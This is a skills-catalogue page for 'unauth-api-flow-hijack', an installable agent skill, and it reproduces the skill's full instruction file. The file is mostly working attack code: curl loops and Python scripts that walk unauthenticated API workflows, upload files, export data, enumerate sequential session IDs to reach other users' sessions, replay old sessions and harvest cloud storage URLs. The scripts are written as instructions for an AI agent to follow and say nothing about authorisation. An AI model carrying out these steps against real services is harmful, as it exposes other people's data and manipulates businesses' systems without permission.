unauth-api-flow-hijack
Exploit unauthenticated multi-step API flows without credentials.
Install / Use
npx skills add uphiago/recon-skills --skill unauth-api-flow-hijackInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
SecuritySupported Platforms
Our assessment of unauth-api-flow-hijack
unauth-api-flow-hijack scores 89/100 on our quality scale, 501st of 971 Security skills we index.
Its SKILL.md is 7.0 KB long, well organised into 24 sections with 6 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so unauth-api-flow-hijack is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
unauth-api-flow-hijack compared with similar skills
All 4 of these similar skills score higher than unauth-api-flow-hijack; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| unauth-api-flow-hijack (this skill)by uphiago | 89 | 1.3k | 29d ago | SKILL.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| Scraplingby D4Vinci | 100 | 84.8k | today | MCP Server |
| crawl4aiby unclecode | 100 | 84.6k | 6d ago | MCP Server |
Frequently asked questions
- How do I install unauth-api-flow-hijack?
- Run
npx skills add uphiago/recon-skills --skill unauth-api-flow-hijack. The install tabs above show the steps for each supported agent. - Which AI agents does unauth-api-flow-hijack work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is unauth-api-flow-hijack safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is unauth-api-flow-hijack still maintained?
- The repository was last updated 29 days ago, so unauth-api-flow-hijack is actively maintained.
Skill content
View source on GitHubname: unauth-api-flow-hijack description: Exploit unauthenticated multi-step API flows without credentials. version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, python3 tags: [recon, API, unauthenticated, flow, interview, form, upload, export] category: recon related_skills:
- api-noauth-hunt
- hardcoded-credential-hunt
- hunt-write-gap
- hunt-idor
Unauthenticated API Flow Hijack
Exploit API endpoints that implement a full business workflow (interview, application, checkout, onboarding) without requiring authentication at any step. Unlike simple data exposure, these flows allow an attacker to participate in — and manipulate — the application's core business logic: submitting forms, uploading files, completing transactions, and exporting data. The entire state machine is accessible without credentials.
When to Use
- An API serves a multi-step workflow (start → step1 → step2 → ... → complete).
- No authentication token, session cookie, or API key is required at any step.
- The API returns session identifiers (UUIDs, tokens) that can be reused across steps.
- The workflow includes file upload, data submission, or export functionality.
- Error messages reveal the expected request format (validating that endpoints are live).
Prerequisites
terminalwith curl and python3.- Discovery of at least one API endpoint that accepts POST without authentication.
- The endpoint returns an identifier (session ID, interview ID, token) that can be passed to subsequent steps.
Quick Detection
# Probe common flow-starting endpoints
for ep in /start /api/start /api/v1/start /begin /init /api/init \
/start-interview /api/interview/start /api/session/start; do
code=$(curl --max-time 30 --connect-timeout 10 -sk -o /tmp/resp.json -w "%{http_code}" \
-X POST "https://target.com$ep" \
-H "Content-Type: application/json" -d '{}')
if [ "$code" = "200" ] || [ "$code" = "201" ]; then
echo "=== $ep ($code) ==="
cat /tmp/resp.json | python3 -m json.tool 2>/dev/null | head -20
# Extract any returned ID
cat /tmp/resp.json | python3 -c "
import sys,json,re
try:
d=json.load(sys.stdin)
for k in d:
if any(x in k.lower() for x in ['id','token','session','key']):
print(f'{k}: {d[k]}')
except: pass
"
fi
done
Procedure
Phase 1 — Map the Flow
Identify all steps by following the API's natural progression:
import requests, json
BASE = "https://target.com"
session = requests.Session()
# Step 1: Start the flow
r = session.post(f"{BASE}/api/flow/start", json={})
data = r.json()
flow_id = data.get("id") or data.get("sessionId") or data.get("token")
print(f"Started: {flow_id}")
# Step 2-N: Follow the flow by submitting whatever the API asks for
for step in range(1, 20):
# Try generic submissions — the API's error messages will guide you
r = session.post(f"{BASE}/api/flow/submit", json={
"id": flow_id,
"answer": "test response",
"data": {"key": "value"}
})
resp = r.json()
print(f"Step {step}: {resp.get('currentStep', '?')} — {resp.get('message', '')[:80]}")
# Check for completion or blocked paths
if resp.get("complete") or resp.get("error"):
break
# Extract any requirements from the message
if "required" in str(resp).lower() or "invalid" in str(resp).lower():
print(f" Validation: {json.dumps(resp)[:200]}")
Phase 2 — Exploit File Upload
If the flow includes file upload, test for unrestricted upload:
# Test file upload without auth
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/flow/upload" \
-F "file=@test.pdf;type=application/pdf" \
-F "id=$FLOW_ID" | python3 -m json.tool
# The response often returns a public URL for the uploaded file
# Check if uploads are stored in a public bucket
Phase 3 — Exploit Data Export
Many flows offer export/download at completion:
# Test export without auth
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/flow/export" -o export.xlsx
file export.xlsx # Check if it's a real file with data
# Try export with different format parameters
for fmt in xlsx csv json pdf xml; do
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/api/flow/export?format=$fmt" -o "export.$fmt"
[ -s "export.$fmt" ] && echo "export.$fmt: $(wc -c < export.$fmt) bytes"
done
Phase 4 — Enumerate and Replay
If session IDs are predictable or exposed, enumerate other sessions:
# Check if IDs are sequential or enumerable
for id in $(seq 1 100); do
code=$(curl --max-time 30 --connect-timeout 10 -sk -o /dev/null -w "%{http_code}" \
"https://target.com/api/flow/status/$id")
[ "$code" = "200" ] && echo "Active: $id"
done
# Test if old session IDs can be replayed
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/flow/submit" \
-H "Content-Type: application/json" \
-d '{"id": "OLD_SESSION_ID", "answer": "replay test"}'
Phase 5 — Chain with Storage Access
If uploads go to a cloud storage bucket, chain with cloud attack skills:
# Extract storage URLs from upload responses
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/flow/upload" \
-F "file=@test.pdf" \
-F "id=$FLOW_ID" | python3 -c "
import sys, json, re
data = sys.stdin.read()
for url in re.findall(r'https?://[^\s\"<>]+\.(?:supabase\.co|amazonaws\.com|storage\.googleapis\.com)[^\s\"<>]*', data):
print(f'STORAGE_URL: {url}')
"
Pitfalls
- Rate limiting kills the flow. Multi-step APIs often have per-IP rate limits. Slow down between steps (0.5-1s delay).
- State expires. Some flows invalidate session IDs after a timeout. If steps start failing, restart the flow.
- Validation gates exist. The API may require valid data formats (email, phone, file type). Read error messages carefully — they tell you exactly what format is expected.
- Not every step is POST. Some flows use GET for status checks, PUT for updates, and DELETE for cancellation. Test all methods.
- The export may be empty. A freshly started flow produces an empty export. Run through the full flow before testing export.
Verification
- Complete the full flow from start to finish without any authentication.
- Verify each step produces a state change visible on subsequent steps (the flow progresses).
- Confirm file uploads are stored and retrievable (check the returned URL).
- Verify export produces real data (check file size and content).
- If session IDs are enumerable, confirm cross-session access (access another session's data).
Related Skills
api-noauth-hunt— Detecting API endpoints that lack authentication.hardcoded-credential-hunt— Finding passwords that unlock privileged steps within the flow.hunt-write-gap— POST/PUT endpoints that accept writes without requiring read authentication.hunt-idor— Exploiting insecure direct object references within flow session IDs.firebase-supabase-attack— If uploads go to Supabase/Firebase storage.
Related Skills
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
Scrapling
84.8k🕷️ An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Don't be shy, join here: https://discord.gg/EMgGbDceNQ and follow here for daily tips and tricks: https://x.com/Scrapling_dev
crawl4ai
84.6kOpen-source web crawler and scraper for LLMs and AI agents: any website into clean, LLM-ready Markdown. Run it yourself, or use Crawl4AI Cloud with one key.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
